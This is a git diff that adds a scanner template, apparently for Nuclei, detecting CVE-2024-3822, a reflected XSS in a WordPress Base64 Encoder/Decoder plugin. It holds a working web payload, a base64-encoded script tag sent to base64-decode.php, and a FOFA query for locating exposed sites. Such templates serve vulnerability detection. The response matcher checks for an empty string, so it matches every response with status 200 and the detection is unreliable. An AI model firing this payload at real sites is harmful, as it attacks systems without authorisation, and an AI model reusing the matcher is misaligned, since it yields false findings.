diff --git a/CVE-2024-3822.yaml b/CVE-2024-3822.yaml new file mode 100644 index 0000000000..16f028eca3 --- /dev/null +++ b/CVE-2024-3822.yaml @@ -0,0 +1,27 @@ +id: CVE-2024-3822 + +info: + name: Base64 Encoder/Decoder <= 0.9.2 - Reflected XSS + author: omranisecurity + severity: medium + description: | + - The Base64 Encoder/Decoder WordPress plugin through 0.9.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin. + reference: | + - https://wpscan.com/vulnerability/ff5411b1-9e04-4e72-a502-e431d774642a/ + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-3822/ + metadata: + fofa-query: "wp-content/plugins/base64-encoderdecoder/" + max-request: 3 + tags: cve,wordpress,plugin,xss + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/base64-encoderdecoder/base64-decode.php?string=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==" + + matchers: + - type: dsl + dsl: + - 'status_code == 200' + - 'contains(body, "")' + condition: and \ No newline at end of file